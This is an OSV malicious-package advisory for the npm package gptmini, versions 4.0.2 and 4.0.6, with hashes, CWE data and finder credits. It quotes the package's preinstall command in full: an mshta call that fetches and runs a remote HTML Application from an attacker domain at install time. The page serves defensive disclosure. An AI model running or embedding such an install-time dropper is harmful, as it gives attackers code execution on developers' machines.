MAL-2026-6537

See a problem?

Import Source

https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/gptmini/MAL-2026-6537.json

JSON Data

https://api.osv.dev/v1/vulns/MAL-2026-6537

Published

2026-06-26T20:13:56Z

Modified

2026-06-26T20:46:36.153219497Z

Summary

Malicious code in gptmini (npm)

Details

-= Per source details. Do not edit below this line.=-

Source: amazon-inspector (cb05abb3d36b111df4aa8fe044cbf05a431a0778e90d022e1621494c1506a171)

On npm install, the package's preinstall lifecycle script (preinstall.js, declared via scripts.preinstall "node preinstall.js") shells out with exec('cmd /c "mshta http://fixars.top"'). This causes Windows to fetch and execute an HTML Application from the remote host fixars.top over plain HTTP at install time with no user interaction, yielding remote code execution on the installer's machine. The package presents itself as a Node.js wrapper for a GPT/OpenAI-style SDK (name gptmini, baseUrl https://api.openllm.ai/v1), with empty author metadata — an AI-SDK-shaped lure paired with an install-time dropper to an attacker-controlled domain unrelated to any documented publisher.

Database specific

{
    "malicious-packages-origins": [
        {
            "versions": [
                "4.0.2"
            ],
            "modified_time": "2026-06-26T20:15:11Z",
            "sha256": "3dec100ae26ee0cca8069caab13d32ed258a12d6494e17495cf7c0f83ec64745",
            "id": "IN-MAL-2026-007659",
            "source": "amazon-inspector",
            "import_time": "2026-06-26T20:38:47.453486767Z"
        },
        {
            "versions": [
                "4.0.6"
            ],
            "modified_time": "2026-06-26T20:13:56Z",
            "sha256": "cb05abb3d36b111df4aa8fe044cbf05a431a0778e90d022e1621494c1506a171",
            "id": "IN-MAL-2026-007658",
            "source": "amazon-inspector",
            "import_time": "2026-06-26T20:38:47.363806895Z"
        }
    ]
}

References

Credits

- Amazon Inspector - FINDER
- - inspector-research@amazon.com

Affected packages

npm / gptmini

Package

Name: gptmini; View open source insights on deps.dev
Purl: pkg:npm/gptmini

Affected ranges

Affected versions

4.*

4.0.2

4.0.6

Database specific

cwes

[
    {
        "cweId": "CWE-506",
        "description": "The product contains code that appears to be malicious in nature.",
        "name": "Embedded Malicious Code"
    },
    {
        "cweId": "CWE-506",
        "description": "The product contains code that appears to be malicious in nature.",
        "name": "Embedded Malicious Code"
    }
]

indicators

{
    "package_integrity": [
        {
            "hashes": {
                "sha512_sri": "sha512-y+UatP7jlK1SEG1FzVuDoJk25gzOlvzEG+i80EwgWc+6mao6abUTCfqoThAjwuacE5eMFc1Xn0m7K966XBdEig==",
                "sha1": "e9aaa64adca84029e700a59f40757818d80ac856"
            },
            "filename": "gptmini-4.0.2.tgz"
        }
    ],
    "evidence_files": [
        {
            "path": "preinstall.js",
            "tlsh": "70b012d499453234b252a0e02c3060225807c441225055e0648c451d441741516235fd",
            "sha256": "6531737cdf18669d076b7ff3bf8168ddc74828f385a4a037a47bd8767d11b889"
        }
    ]
}

source

"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/gptmini/MAL-2026-6537.json"